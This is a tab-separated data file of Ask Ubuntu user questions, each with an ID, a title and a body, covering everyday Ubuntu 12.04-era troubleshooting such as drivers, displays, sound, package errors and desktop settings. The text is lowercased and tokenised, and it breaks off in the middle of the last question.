152181	how can i disable autohiding of the top panel in scribes ?	i liked the scribes text editor very much . but the auto hiding feature of the top panel is annoying . how can i get rid of if . or can i disable auto hiding of top panel in scribes ? , how ?
152184	how do i fix `` malformed line '' errors in sources.list ?	i had problems with my movie player . the sound was fine but the picture seemed to hesitate or stick or pause every few seconds so i was looking for some help on how to do this . i tried to install a command in the terminal and got this message : e : malformed line 68 in source list /etc/apt/sources.list ( dist parse ) can someone tell me how to fix this problem . i can not open the software center or the update manager . the only other option i can think of is to wipe everything out and do a clean install . thank you .
152191	getting the name of the process , that corresponds to the active window	how can it be did using python ( in ubuntu ) ?
152192	how to open mutilple instances of the terminal ?	in former releases of ubuntu , one could easily have an independent terminal window open in each workspace . for example , one could be used for editing program code , another compiling and linking and a third one for testing , each in it 's own workspace . but in ubuntu 12.04 , it seems that each workspace can only contain another but different application ?
152193	how to open directory in guake from nautilus	in nautilus , i have upon right-clicking a directory , the option to open a terminal with the prompt in the selected directory . i think this is very handy and i use it a lot . now i would like to use guake instead of the classic terminal . is there a way to do this ? i 'm struggling with nautilus-actions . i can open guake allright ( i.e . it drops down from the top since it 's permanently loaded ) , but the prompt is n't located at the directory of choice . in addition , it 's one more mouseclick to open the terminal ( if it would work ) , i would prefer a shorter way . anyone any idea how to manage this ? ( or could this be a possible feature request ? ) ubuntu 12.04 , gnome-classic without unity
152201	a good flash player	is there any software in ubuntu , like kmplayer ( in windows ) that can play swf ( flash files ) which give us the ability to fast forward and rewind and a full track bar to change the position ? with kmplayer you can play swf files like video files ( of course in windows ) .
152204	why is my broadcom wireless card not working even after installing the b43 driver ?	i 'm using ubuntu 12.04 . network controller is bcm4311 , lap top is a dell latitude d830 . i 've updated , upgraded , installed firmware-b43-installer , fwcutter , and it 's still not detecting my wireless internet . iwconfig says no wireless extensions for lo or etho even though the controller is detected . trying to manually add the wireless network through network manager also has n't worked . it 's just not detecting the wireless network . showing the driver is apparently working and the output from lshw -c network : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fe8fc000-fe8fffff output from rfkill list all : 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no what else can i try ? all of the solutions i 've seen have said that fwcutter and the firmware-b43-installer are the answer but they have n't been working for me .
152205	how does ssh deal with public keys ?	in ssh the client publishes his public encryption key into the server authorized_keys file for a given user . i am interested in understanding better how the public key is used context of authentication . at which stage is it used ? are there digest messages being exchanged ? i googled it and found no clear answer to this questions . thanks !
152207	check disk before installing ubuntu , gave me error in 1 file	i used unetbootin to make a bootable usb to install ubuntu 10.4 tls , during installation , at 55 % , i got an error [ errn5 ] or something like that , next time i rebooted , i checked the disk to see if there 's errors , at the end it said `` error in 1 file `` , what now ? how do i fix it ? how do i know which file ?
152208	how to set password to open an application ?	how to make an application like gnote or tomboy ask for a password when launching them from my user account .
152210	ubuntu 12.04 is soundless ! ( only ready and startup : ( )	windows . is the operating system that most popular from microsoft which has many sound effect , such an error , exclamation , start , off , etc . now you have to help me to `` re-enable '' these sound bellow : -log off , -shutdown ( already apply since 4.04 but discontinued since 8.04 ) . that 's it ! @ compaq510 @ ubuntu12.04 answer it with detail such editing .sh , or else as you can ! other sound in 12.04 such critical stop , warning , etc . is just applied . some other hidden not . so hidden sound is bonus mission ! good luck : d
152216	403 error when using nginx to access file other than index.htm	i set up nginx on ubuntu 12.04 and when remotely accessing a file other than the index.htm/php/html , the server says that access is forbidden . i tried to search for a solution but no luck . any ideas/hints/solutions ? ? ?
152219	need help with software center	i just asked a question , how to fix this problem . i received an answer : and thank you but it makes no sense . i just asked a question : how to fix : e : malformed line 68 in source list /etc/apt/sources.list ( dist parse ) i received an answer ... .thank you to who ever gave the answer but it makes no sense . i am new to ubuntu so if you could help me a little with this i would be grateful . i sort of need a step by step instruction to fix this problem . the software center wo n't open and the synaptic package wo n't open either . i was going to try deleting these two and reinstalling but i ca n't do it if they wo n't open . i do n't understand what happened but i looked on the line 68 and there was nothing misspelled or out of place that i could see . thanks for the help
152221	dual monitors - i 'm almost there , but my mouse cant cross the divide	i 'm having a very strange problem with the open-source radeon drivers . in a valiant attempt to set up dual monitors on ubuntu , i have a ) used to open source to no avail ( mirrored displays ) b ) upgraded to 12.04 with no difference c ) tried using fglrx , where stranger bugs abound ( one screen white , the other perfectly fine ! ) d ) made many attempts to purge fglrx , one of which resulted in could not write bytes : broken pipe * starting the winbind daemon [ ok ] saned disabled , edit etc/default/saned * starting anac cron [ ok ] * stopping anac cron [ ok ] * checking battery state ... the odd thing is , it 's a desktop . shutdown ( not startup ! ) hung on this message until i forced it . e ) finally , fglrx is purgred ! magically , this seems to fix all my previous problem with the open-source driver . i can drag windows across ! no more mirrored displays ! but there is still one problem ... even though i can drag windows across ( i know this because the window appears partway between screens ) , i can not drag my mouse across . it gets stuck on the edge of the window ( all of the edges , in fact ) even though the window makes it partway across . am i not just pushing hard enough ? or are there larger things in play here ? and most importantly , how do i fix the problem ?
152228	ubuntu 12.04 desktop freezes , or rather the mouse recognition	i have a problem . the ubuntu desktop freezes in a way , that i can still type , do everything on the keyboard but the mouse does n't work . i can move it around but it does n't highlight anything in the launcher and the mouse buttons do n't do anything . can anybody please help me ? thanks
152232	how do i get the touchscreen on an hp l5006tm working ?	i just got an hp l5006tm given to me ( it was going to the dumpster -- wtf ? ) and i 'd like to use it with my ubuntu desktop . i 've looked at some pages of the wiki but i 'm not sure where to start to get the touchscreen working . it 's currently acting as a screen , but the touch part is n't working . any advice ?
152233	delete all traces of windows from ubuntu	i used to have a dual boot in one of my hard disk drives - ubuntu and windows 7 . then , i added a ssd which is now my main hard disk drive , and i 'm using it for windows 7 completely , keeping ubuntu in the old hd . i restored the grub so everything works ok , except for one thing . everytime i update the grub , it detects two windows : found windows 7 ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sdb1 obviously , i do n't want it to detect the windows on sdb1 . because i no longer use it ( i manually deleted the files ) . what can i do about that without wiping out completely the partition ?
152234	how to mount drive without partition table ?	i have an ubuntu 10.4 slice on rackspacecloud that is no longer responding after trying to upgrade to 11.10 . i used their `` rescue mode '' to boot another slice with access to my old server , which gives me the following information on my main partition when i use fdisk -l : root @ server : ~ # fdisk -l disk /dev/xvdb : 81.6 gb , 81604378624 bytes 255 heads , 63 sectors/track , 9921 cylinders , total 159383552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/xvdb does n't contain a valid partition table when i try and mount this , it wo n't let me without fixing this issue : root @ server : ~ # mount /dev/xvdb /mnt mount : you must specify the filesystem type i 'm guessing that the lack of a partition table is why i ca n't boot into the server -- is there a way to fix this or at least get access to the data on this disk ? update : just tried again with a fresh rescue instance and got a little closer with : root @ server : /var/log # mount /dev/xvdb /mnt root @ server : /var/log # cd /mnt root @ server : /mnt # ls -l total 16 drwx -- -- -- 2 root root 16384 2012-06-17 14:33 lost+found the lost+found folder is all that is in the newly mounted drive which i suspect is because of the missing partition table again . i 'm new at working with partitions on ubuntu , so i may be making an obvious mistake -- any resource suggestions or other tricks greatly appreciated .
152238	ubuntu will not boot without the pen-drive	i 've just installed ubuntu on my pc and now it does n't start unless i change the boot priority , if boot priority is my hd then it does n't start and if boot priority is my pen-drive then it starts . if i remove my pen-drive , the system keep working normal , but if a restart my pc without the pen-drive , it will not start . could someone help me ?
152239	how do i fix `` bzr : error : unable to determine your name . `` ?	i am trying to quickly create my first app and am getting gtk errors when i try to run or create an application . here is a copy of what i executed and what results i got : daniel @ laptop : ~/pydevelopment $ quickly create ubuntu-application app001 creating project directory app001 creating bzr repository and committing launching your newly created project ! /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `app001window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) congrats , your new project is setup ! cd /home/daniel/pydevelopment/app001/ to start hacking . daniel @ laptop : ~/pydevelopment $ cd app001 daniel @ laptop : ~/pydevelopment/app001 $ quickly design daniel @ laptop : ~/pydevelopment/app001 $ quickly rub error : no rub command found in template ubuntu-application . candidate commands are : add , commands , configure , create , debug , design , edit , getstarted , help , license , package , quickly , release , run , save , share , submitubuntu , test , tutorial , upgrade daniel @ laptop : ~/pydevelopment/app001 $ quickly run /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `app001window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) daniel @ laptop : ~/pydevelopment/app001 $ quickly package ... ... .ubuntu packaging created in debian/ ... ... . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some errors : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- bzr : error : unable to determine your name . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : ca n't create or update ubuntu package error : package command failed aborting
152244	how to modify gnome-shell animations ?	i use docky in gnome-shell and it 's annoying that when i minimise a window , it goes up to the top left corner . i know mutter is n't that customisable but is it possible to get a minimise effect similar to that of cinnamon , here the window just shrinks and disappears ? thanks
152250	ibus symbol disappears for japanese language selection	similar to this post no ibus icon in kubuntu , i have trouble with the ibus icon in ubuntu 12.04 . each time an update is installed , the language selector for japanese disappears from the top panel . i need to uninstall and install japanese again , then reboot , to make the symbol appear again . in this thread no ibus icon in kubuntu 12.04 the suggestion was to install the japanese version of ubuntu , but is it really true that one has to stick to a special version of ubuntu to get this problem solved ? if so , how can i transfer the settings easily from the current version to the japanese one ?
152253	ubuntu 12.04 version of netbeans does n't have the javafx plugin	i just want to know why does netbeans 7.0.1 from the official ubuntu 12.04 does n't have all the plugins ( in especial the javafx plugin ) on it while the official netbeans from the website ( even the version with the less plugin ) , has it by default ? and how can we change that ? because i love ubuntu ( even if it is extremly slow on my asus 1215n ( it is the only os that is slow on it , but that 's not very important ) , but i am trying to use it only with the software provided by the original repositories without having to download manually or even use any ppa . thanks in advance
152255	kde keyboard problems ubuntu 12.04	i have unity & gnome 3.4 installed successfully . all dell keyboard keys work perfectly with both . i installed kde - full via terminal . everything is working great except for the hotkeys . no calculator , no mute , nothing . i check which keyboard is selected and choose dell multimedia usb keyboard . no luck . how do i get my dell keyboard to work with kde - the same keyboard that works with unity & gnome 3.4 . thanks in advance for any advice .
152256	how do i switch from lightdm to gdm ?	how do i switch from the default display manager ( lightdm ) to the older display manager ( gdm ) ?
152257	how can i force glade to be in english ?	i use ubuntu 12.04 with polish localization . if i start : `` quickly design '' , glade shows up with polish interface . i do n't like that , i 'd like glade to be in english . how can i achieve that ?
152261	12.04/ firefox and chrome adobe pdf isnt working	when i try to open a pdf in new tab . the browser errors out with a white screen and if i want to open in document viewer , i need a password . on my windows machine , it opens just fine . never showing a loading indicator . then i downloaded the .deb of adobe reader from their site and installed it . it fails to open it . on a different 12.04 computer . the adobe reader program opens the pdf but then goes back to grey screen saying `` adobe needs to be updated '' . please help .
152269	is there a native way to share a link ?	is there some sort of api available in ubuntu that allows you to share a link with twitter , facebook etc ? i 've found this : https : //code.launchpad.net/~ken-vandine/+junk/gwibber-api-examples but it does n't seem to work . thanks
152270	how to recover broken dpkg after lucid-bleed ppa-purge ?	did a ppa-purge of lucid-bleed and dpkg did n't downgrade properly and now it is broken . dpkg : predepends : tar ( > = 1.23 ) but 1.22-2ubuntu1 is to be installed what scares me is when simulating the removal of dpkg i get : removing this package may render the system unusable . are you sure you want to do that ? and then the list of packages which depend on it , which will also be removed , is obviously very long . is it safe for me to remove dpkg just to reinstall it ? how would i ensure the list of packages which were also removed are then reinstalled ? will forcing the version of dpkg help ? ( fyi : simulating a forced version brings up a much smaller list of applications which will also be removed ) . any other suggestions ? additional information based on comments : ppa-purge log : http : //pastebin.com/1kt8clvp if i sudo apt-get install dpkg=1.15.5.6ubuntu4.5 i get the following packages have unmet dependencies : libdpkg-perl : depends : dpkg ( > = 1.15.8 ) but 1.15.5.6ubuntu4.5 is to be installed which sucks because that means more would be broken after doing so ... but when i force the version through synaptic i get : to be removed alien , build-essential , cdbs , checkinstall , debhelper , devscripts , dpkg-dev , google-earth-stable , googleearth-package , libdpkg-perl , lintian , lsb , lsb-core , lsb-cxx , lsb-desktop , lsb-graphics , lsb-languages , lsb-multimedia , lsb-printing , lsb-qt4 , lsb-security , ubuntu-dev-tools .
152274	why is 12.04 running so slow ?	i installed a fresh version of ubuntu 12.04 , and when i boot it is slow , everything is slow mouse movement loading an application etc . when i boot using `` recovery mode '' is is very snappy . what is causing the slowness ?
152275	why does gnome-shell act differently on my desktop than my laptop ?	another question today ; i have gnome-shell installed on both my laptop and my desktop , but on my desktop it acts entirely different then if it is on my laptop . i know that sounds weird , so here is a description : on my laptop , gnome-shell is used through a menu ( accessed using the windows button on my keyboard , or an on-screen button ) which lists all my open applications and workspaces . i prefer this version greatly . on my desktop , though , gnome-shell acts nothing like this . instead , the top of the screen lists applications and places . through applications i can access , obviously , the different applications , and through places i access the home folder and the like . these two enviroments are entirely different , yet both go under the moniker `` gnome-shell '' . how is this , and how do i convert my desktop to the laptop format of gnome-shell ?
152277	my hard disk with vista and wubi is failing , how can i use wubi to rescue it ?	can i just drag stuff to the 'host ' folder ? ( which contains my windows files ) or some other way ? i have windows vista and the hard disk is dying ( the annoying 'a hard disk is reporting health problems ' popup keeps coming on ) i can access ubuntu , but when i try to boot windows vista i just get an endless black screen current pending sector count and number of reallocated sectors are failing 'overall assessment : disk failure is imminent'
152278	problems playing openarena with qjoypad	openarena looks like an awesome game , and i ca n't wait to give it a go . i use a gamepad for pc games because i 'm on a laptop with a trackpad . of course i need some software to map the controller out to button clicks and mouse movements . on windows , i use xpadder . after looking around and trying a couple , i found qjoypad for ubuntu . after configuring the controller , i can verify on the desktop that the thumbstick is configured correctly ( i.e . it functions as a mouse would ) . but when i start the game , no matter which direction i move the thumbstick , i can only look right and down . if i press up , it goes down . if i press down , it goes down . left goes right and so does right . obviously , this makes it very hard to play openarena in a way that could be described as entertaining . i 've checked to make sure 'free look ' is ticked in the menu settings . it is . any suggestions ? edit : i am still experiencing this problem , and still hoping someone can help me find an answer .
152280	how do i customize wubi ( like a livecd ) ?	i made an customized version of ubuntu 10.04 lts with my required software , but after customization , wubi.exe does not work . any idea how to make it work again ?
152284	accomplishments installation problem , not showing trophies	installed via the ppa . with 0.1 i would get a force close upon starting the accomplishments app . with 0.2 it starts fine , i was prompted to sign into ubuntu one and the app remains blank . i ca n't see any of the available trophies ( opportunities ) . if i check `` identification '' it states that more information is needed but also states `` no extra information is required , most likely trouble with your installation . '' i have re-installed a couple times via synaptic but that did n't help . i am very eager to have this installed as i am trophy kinda guy but so far it 's just not happening .
152287	mouse and keyboard do n't work	i 'm pretty new to ubuntu . i 'm coming from a slackware background . i 've installed ubuntu 12.04_64 lts on dell inspiron n5110 laptop . for some reason , though , the mouse and keyboard do n't work what so ever after the installation . if i boot from the livecd everything works fine . i 've tried to boot in `` recovery '' mode but the result is the same - no touchpad , no keyboard . is there any particular reason for this to happen ? where should i start debugging ?
152288	amarok only shows 6 tracks even though there 's way more than that	i 'm using amarok 2.5.0 on kubuntu 12.04 . only 6 tracks show up in my local collection , but dynamic mode plays all the tracks in my collection as it should . how do i get all the tracks to show up in my local collection view ?
152291	synchronize applications between computers automatically	the ubuntu software center has `` sync applications from other computers '' and `` reinstall previous purchases '' options . however , i do n't think either of these functions can install or synchronize multiple programs automatically . is it possible to configure the software center ( or any other application ) to synchronize software packages automatically ? if not , is such a feature being planned for the software center ?
152294	unable to boot ubuntu 12.04 live cd	i am unable to boot from an ubuntu installation disk . when i try to boot , it starts windows automatically . i am using ubuntu 12.04 live cd .
152295	how to revert to old version of ubuntu ? like windows `` restore '' points ?	i 'm new to linux ( ubuntu 12.04 ) and i 'm finding that as i try to do new things , i end up breaking parts of my installation . it would be very useful if there is an easy way to back things up so that i can revert to a previous working version of my environment . what 's the best ( and simple ) way to do this ? i 'm thinking it must be something like a windows restore point , but some of my searches have found people specifically saying there 's nothing like that ( it is not how linux 'works ' ) .
152297	how to configure extra buttons in logitech mouse	can anyone tell me how to configure all the buttons on a logitech mx 620 mouse ( http : //www.logitech.com/en-us/support/mice/2987 ) under ubuntu 12.04 ? specifically , i like to make one of them just the ctrl key ( for control clicking webpages ) and another one ctrl-w to close tabs . i also normally make the scroll wheel page down for each click ( otherwise it hurts my arms to be scrolling so much ) . i make pushing the wheel to the left = pageback and pushing to the right = page forward . i 've searched for other answers to this and found something related here : http : //ubuntuforums.org/showthread.php ? t=1789807 but when i posted a followup post to solve the issue , no one responded -- perhaps i made the mistake of posting to a question that had been `` solved . '' i 'm not sure how i 'm supposed to reopen a question that is pertinent to my question but does n't quite solve mine . thank you for any help .
152303	getting bose usb speakers to run through usb without crackling	i know there is a similar post here : usb bose speakers with ubuntu 12.04 but it has n't been resolved/answered and i 've learned a little more about the problem , so i thought i 'd start a new thread on it . i 'm hoping someone can help me to get my bose usb speakers to run through usb without crackling in ubuntu 12.04 they are these speakers : http : //www.bose.com/controller ? url=/shop_online/digital_music_systems/computer_speakers/companion_5/index.jsp using the `` sound '' gui in 12.04 , i have output set to `` bose usb audio . '' it often starts the subwoofer at maximum volume for some reason i do n't understand . the main problem is that playing video in firefox or chrome ( both ) eventually causes the sound to die ( go completely silent ) . at other times , ( like if i play an .avi file ) the sound crackles or is garbled , but i can still make out the words people say fine . it appears to be a pulse audio issue , but i 've tried all the workarounds i 've seen posted here , on ubuntuforums.org , and also on a few other sites , and nothing seems to work . i 've make some followup posts but no one has responded . i can turn off my onboard sound in my system bios , but that does n't seem to help . i 've modified a .conf file , but that did n't work either ( changing -2 to -1 to and deleting a couple lines so usb would load , but like i said , it 's not that the sound wo n't work at all , it 's that it seems to get overloaded and stop working ) . of particular interest , i have noticed that ( a ) the more tabs i open at once with video playing , the faster the sound goes silent and ( b ) i sometimes get sound when i move the mouse around the screen or when i scroll webpages . additionally , after working to solve this problem at some length , i seem to have introduced a new ( though minor ) issue : now when i 'm booting into ubuntu ( when the splashscreen is on ) i get some high pitched squealing sounds . they go away when my login comes up , but it would be nice to eventually get rid of this too . thank you for your help . i posted a log file from my audio from during the problem ( from working to non-working state ) in the first link i copied above .
152304	send or move a window from one monitor to another with a shortcut key under ubuntu 12.04 and nvidia 8600 gt without proprietary nvidia drivers	i would like to know how to send or move a window from one monitor to another with a shortcut key under ubuntu 12.04 and nvidia 8600 gt without proprietary nvidia drivers . now , i know i can configure keyboard shortcuts under the `` system settings '' and `` keyboard '' but move a window from one monitor to another is not one of the options . specifically , i 'm not interested in moving from one workspace to another , nor do i want to move among multiple windows of the same program . i want to take my gvim ( or firefox ) window and have it go from the left to right monitor ( or vice versa ) without having to use the mouse . there must be a good way to do this , does anyone know ? thank you , your help is very much appreciated ! rick note : i 'm avoiding using the proprietary ( and ill-reputed ) drivers for my nvidia 8600 gt . i did that under my first install of 12.04 and lost the ability to rotate the screens ( i use both in portrait view ) and could n't get it back again , which forced me to reinstall 12.04 . at this point i 'm far enough along in setting things up nicely i do n't want to have to reinstall again .
152306	problems with intel video resolution on acer laptop wide display	i have an acer aspire 5332 laptop which i have just installed ubuntu 12.04 x64 , which is causing some issues with the video display on boot and video resolution . first and foremost , it will only boot past the purple screen if grub has been edited to replace 'quick splash ' with 'nomodeset ' . secondly , once it has booted with the the 'nomodeset ' option , it does not allow me to change the resolution higher or lower from 1024 x 786 . is it ok to use the 'nomodeset ' for normal use ? will this compromise performance of other devices ? the video card is an on-board one , integrated within the intel gl40 chip-set . the display is a wide-screen lcd , and under windows could operate under various resolutions . ideally i would like it to operate on a resolution to fit the wide-screen display as it a bit stretched out at the moment , and less desktop space as i am used to . i believe the optimal resolution is 1366 x 768 . below is some information from the terminal which may be useful . ricstr @ aspire-5332 : ~ $ lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) ricstr @ aspire-5332 : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 768 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0*
152311	how do i get ubuntu 11.10 to recognize my external drive ?	i have a seagate external drive that i 've used with my mac ( firewire ) . i 've just installed ubuntu on a new netbook , so i 've had to use the usb cable for the drive . when i plug it into the netbook , i get nothing . the system does n't seem to recognize there is a drive now attached . how do i find it , and mount it ?
152313	where will my full name be used ?	during installation , the installer told me my name would be used for things like the default 'from ' in emails . so now i 'm wondering : where else will my name be used ? what benefits do i get from using a real vs a fantasy name in my user 's full name ? which programs can access that name ? i 'm worried about privacy/anonimity
152322	after logging into gnome 3 in ubuntu 12.04 i have to pan scan the page ?	when i log into gnome 3 , i have to drag the cursor around the page to see everything . i 'm running a toshiba a100 satellite . system settings : driver : unknown experience : standard a quick google found that it could be a intel graphics media accelerator 950 . edit : found it 's more likely to be nvidia corporation g72m [ quadro nvs 110m/geforce go 7300 ] ( rev a1 )
152324	gnome installation	i downloaded the gnome shell but i can not get it to run . i am a newbee to ubuntu and seriously dislike unity . i want to run gnome , as this looks like a desktop/gui i would be comfortable with . any help would be greatly appreciated . thanks . i am currently running 11.10 .
152326	how do i share my files from windows 7 to ubuntu ?	i just downloaded ubuntu to my laptop and i noticed that my files like music and pictures are n't here . how can i get them from my windows 7 part of my computer to the ubuntu part ? please make it simple and step by step . also to be clear this is all on one device .
152327	lower-case 'c ' key not working in bash	this is a bit of a strange one . i 'm running ubuntu 12.04 . it 's been working well but today , i ran into a hell of strange phenomenon . i can no longer type a lower-case 'c ' in bash . at first i thought it was a misconfiguration for the gnome terminal but i tried both a stock xterm and directly at the console ( ctrl+alt+f1 ) and the issue was the same . i can type an upper-case c without any difficulty and i can type lower-case 'c ' in any other terminal based program ( vim , bash , less , etc. ) . the lower 'c ' also works if i jump into plain old sh . i looked at all the configuration files i know of and have n't found anything incriminating in there . i suspect it 's not going to be that simple anyway because if i run bash with the ' -- norc ' option from within sh , the problem remains . i do n't know what else to check . in fact , if i wanted to cause this problem on a given machine , i have no idea how it could be done . total mystery .
152337	how to silently adjust system volume ?	i am using 12.04 lts . is there a way to properly disable that feedback sound when you are adjusting the volume ? i would like to adjust the volume on my system without producing those `` pops '' . unfortunately this old thread did not produce any answers that are useful for my situation , since disabling all notification sounds impacts the use of many applications .
152344	can i install an external webcam successfully ?	my laptop , thinkpad r61i , does not have a built-in webcam . if i buy a generic webcam , can i install it on ubuntu 12.04 ? i googled around and a blog post said cheese is one of the best webcam softwares in ubuntu . would cheese and other webcam softwares be able to work with an external webcam ?
152347	some games do n't launch from unity	whenever i try to start some games from the sidebar , their icon just glows a few times and then stops . i 've tried if with the following games and they do n't seem to work : i have tried : licity-ng , supertuxcart , stellarium , ect .
152348	gedit embedded terminal uses incorrect palette	i 've followed the advice to turn off `` use-theme-colors '' and also set a custom background color in my embedded gedit terminal . but somehow , the palette setting is ignored and colors show as only black and white . as usual , a picture is worth a thousand words . apparently i ca n't inline images , but the upload seems to have worked : depiction of problem
152351	are the ubuntu app developer showdown workshops recorded ?	i am a new developer who wants to participate in the ubuntu app showdown . i would like to go to the ubuntu app developer showdown workshops but its abit hard with my schedule . will these workshops be recorded ? it would be nice so that i can watch these workshops later on .
152356	why does ubuntu reset brightness settings at the loading screen ?	since i first installed ubuntu 11.10 , i noticed that volume and screen brightness get reset every time ubuntu starts . why is this so ? and what ways are there to keep brightness and volume levels after rebooting ? i have found some scripts that change the screen-brightness at login . but this is not a good solution since login is slower because it seems to wait until the screen brightness is at the level specified by the script . after entering the password i see the screen brightness go down gradually . only after this is complete ( ~1 or 2 seconds ) does the background disappear and unity come up . the screenbrightness is not remembered but instead redefined at login . so it gets remembered for the first part of the boot , then set to max and then again re-set to normal value by the script . my boot process is as follows : desired brightness : 2 ( 13,33 % ) / max brightness : 15 ( 100 % ) bios / brightness : ok grub ( violet background color , white text ) / brightness : ok ubuntu loading screen with the dots / brightness : max ( win7 loads with ok-brightness ) user login / brightness : max unity starts / brightness : ok it seems to be more like a temporary patch than a actual solution . i 'm looking for solutions that set the desired brightness permanently and consistently throughout the whole boot-process after updating to 12.04 the behavior is the same . i tried setpci -s 02:00.0 f4.b=xx the value of f4.b is always '0 ' regardless of what value i try to set it to ( tried 0 , ff , f , 5 , etc ) the solution in this answer does not have any noticeable effect : desktop does n't remember brightness settings after a reboot the variables at /sys/class/backlight/acpi_video0/ get changed if i use fn+up and fn+down any help is appreciated . thanks !
152358	how to set up multiple gpus ( 12.04 ) ?	i have two gpus : one intel i915 integrated , and one nvidia 560 ti . this is not a hybrid setup , nor a laptop . in windows 7 , each card is connected to a different monitor , with the nvidia doing any `` heavy lifting '' . for the life of me i can not get ubuntu to recognize the i915 , but when logging off or rebooting , the shutdown actually appears on the i915 . lshw lists both . i 'm running the `` current '' nvidia drivers ( not the experimental ) , but displays calls its monitor a `` laptop '' . is this even possible under ubuntu ? the only things that even looked like potential solutions were for laptop hybrid setups and used bumblebee , but that does n't seem to apply here .
152360	does ubuntu app showdown allow inventive games ?	yes , i have an idea i have been toying around with for a game for a long time . but just have n't had a real reason to get it going . til the showdown was announced that is . its a very out of the ordinary rpg style game . i 'm not a programmer so i would be using illumination software creator to make it . most likely with the help of the lunduke forum , and attribution given where needed . but i need to first know if my entry would even be accepted ? i plan to have the load , save , and new game options , as well as other interesting ones that may come to mind , as the quicklist requirements . so the only question is , do innovative games scratch an itch ?
152364	difference between ~/folder and /home/username/folder when creating a path in /etc/environment	i had an executable script on my ubuntu located on ~/project/ directory and i tried to add that path to /etc/environment . so , i edit the path to this path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : ~/project/ '' . then , i logout and login back , open the terminal as su and run the command to execute my script on that folder but the result is command not found . then , i change the path in /etc/environment to path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/r0xx4nne/project/ '' and voila it works.now i can run the executable script inside ~/project/ without fail under su command . my question is , what 's the difference between ~/project and /home/r0xx4nne/project when it comes in case of creating a path in /etc/environment ? why it happened to be like this ? i am a newbie and i just want to know more . thanks for any reply .
152368	eclipse wo n't launch in ubuntu 12.04	i 've installed eclipse but it wo n't launch . i tried launching from the app launcher and with the terminal and i keep getting this error : an error has occurred . see the log file /home/kreshendo/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1339994725811.log . i can post the log information if you need it .
152371	how can i easily share the output of a command or a text file with others ?	i recently asked a question on ask ubuntu ( or somewhere else ) , and a comment or answer asks me to paste the contents of some file or the output of a command to troubleshoot my problem . how do i do that ?
152374	where is the information about free space in a disk stored ?	i am using indicator-multiload and would like it to show the free disk space in my partitions . so , i went through the code , and found out that the author was parsing the contents of /sys/block/ ( device ) /stat to get the read and write speeds . ( where 'device ' can be sda etc. ) . i looked around sys/block and could n't find anything useful that could give me info about free space in a disk . although /sys/block/sda/size gives the total available space , i could n't find an entry for free space . i want to know if there is a file in the linux system which explicitly stores free space information . if not , can you suggest a way on how i could get an indicator with stats on free disk space .
152379	ubuntu 12.04 login screen freezes / monitor problems	just bought a new computer and installed ubuntu 12.04 32-bit version . after i enter my password , the screen freezes either at the login screen or with the ubuntu 12.04 lts logo at the bottom . i rebooted with the reset button on my computer and it froze at a purple screen before even going to the login screen . i think this is some problem with the graphics , but not 100 % certain . when i assembled the computer at my friends house and used his monitor , everything worked just fine . the issue happened when i brought the computer home and used my acer monitor . the computer has a dvi port and i use a dvi- > vga converter with a vga cable . when the login screen does appear , it starts from the middle of the screen and wraps around from the left . i did ctrl+alt+f1 and entered the terminal mode . i was able to successfully login from the terminal . so nothing is wrong with my files , maybe something with unity . i did a `` grep failed /var/log/xorg.0.log '' and it gave me a `` failed to load module `` fglrx '' . i tried to do sudo apt-get install fglrx but that did n't work because it could n't find any files named fglrx . i did a locate fglrx and it did find some fglrx-desktop files . any thoughts ? i maybe missing drivers needed for the acer monitor , but i do n't know how to install drivers in ubuntu . i have : acer s232hl lcd monitor asus radeon hd 6670 graphics card intel core i7 processor edit : i found out that i do n't have any fglrx installed on my system , except for /usr/share/app-install/desktop/fglrx-driver.desktop /usr/share/apport/package-hooks/source_fglrx-installer.py /usr/share/jockey/handlers/fglrx.py it seems that several attempts are being made to load some driver : $ grep `` autoconfigured driver '' /var/log/xorg.0.log [ 9.937 ] ( == ) matched fglrx as autoconfigured driver 0 [ 9.937 ] ( == ) matched ati as autoconfigured driver 1 [ 9.937 ] ( == ) matched vesa as autoconfigured driver 2 [ 9.937 ] ( == ) matched fbdev as autoconfigured driver 3 but the only available drivers are the following : $ grep drivers /var/log/xorg.0.log [ 15.459 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 15.466 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 15.481 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 15.482 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 15.492 ] ( ii ) loading 